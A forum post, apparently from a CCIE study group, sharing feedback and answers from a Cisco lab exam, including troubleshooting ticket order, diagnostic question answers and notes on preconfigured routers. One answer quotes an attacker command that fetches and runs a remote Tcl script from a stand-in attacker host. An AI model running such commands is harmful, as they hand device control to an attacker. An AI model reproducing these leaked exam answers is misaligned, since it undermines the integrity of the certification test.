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View Full Version : Feedback ts1, h3 diag, h2 cfg - brussels feb 12th 2020-pass

02-19-2020, 01:59 PM
I would like to share a feedback from C4C group


1st Attempt - TS2,H1+ DIAG,H1+ CFG, Dubai
2nd Attempt - TS1,H3 DIAG,H2 CFG, Brussels

TS1 is very stable and all faults are in the WB. No supprises. all faults covered in january till date feedbacks.
properlly knowledge is key as the naming convention is changed a bit. name used for pool, access-list etc
Solved all 10 tickets and tested again after.
Order of attack - group tickets into 4
6 1 (1), 2 4 7 (2), 3 5 8 (3), 9 10 (4)
group 1 - start with 6 or 1. i prefer 6. always easy to solve. no dependencies. You need a good start to be calm like home lab
group 2 - order is based on dependencies. PPP=>EIGRP=>DMVPN. also on same side of lab. safe time
group 3 - order is based on dependencies. OSPF=>BGP=>MPLS
group 4 - good way to end when all the others are working.

DIAG H3 (did not bother which variant)
Ticket 1
Q1 packet number 114 (using bootp in capture file)
Q2 16 options to choose 1 from, need know exact option. source ip address is
Q3 Click link between SW1-SW3. Where the packet was captured.

Ticket 2 (http.request.method==GET worked for me victim is source)
Q1 Select the 4 options with victim/attacker logic
Q2 i saw sudo poweroff
Q3 command tclsh http:attacker_ip.bd2 tcl

95% Workbook + 5% feedback + self judgement
labs are stable. Same as workbook mostly
Generally need check pre-config first. alot done already
Some Preconfig produce same result but diffent solution from WB. Need to check first. Dont rush to configure WB solution.

2.1 - ospf for DC, HQ and MAIN preconfigured using network statement under s r o
the priority for SW101 and SW102 you need do at the interface level. interface vlan101 => ip ospf prio 255 same as WB.
no preconfig for ospf in the core . no network statement needed int the core as per requirement.

2.3 - network preconfigured. You can use like that no need change to specific interface ip. but need to convert to named EIGRP

2.5 - there is a RD/RT preconfig on R51 as below. dont let it confuse you remove it but you must use ip vrf GREEN. Use the Workbook RT/RD plan
ip vrf GREEN
rd 65100:100
route-target export 65100:100
route-target import 65100:101
Saw two feedback before me and they both remove it and passed. Reason is requirement said the ASN:nn plan on all the nine (9) PEs must be consistent.
plus its a modification. you are removing for convinience and replacing it with something similar and convinent for you

3.1 - mpls ip preconfigured on 8 nodes R1 to R8. check using sh mpls interface first. R9/R10 need do mpls ip on both e0/0 and e0/1. none is preconfigured.

4.2 - I ignored it. i did not do it at all. cisco gave some instructions at the end of the requirements to get it working properlly though.

All the other sessions i did not comment are same. All same as WB

Other useful tips;
Study well ahead, stop labbing 2 to 3 days to exam. Sleep well to gain energy.
Instead read notes, WB solutions and feedbacks. Practice DIAG. Reading only NO Labbing. Labbing 2 or 3 days to exam will get you very tired and nervious. This was my experience in 1st attempt. This time i used the approach i mentioned above.

Thanks to CC Dreamer & Combat c4c. Your active lab group, feedbacks made available. Exam Next Week folder and shares all good.

All the best guys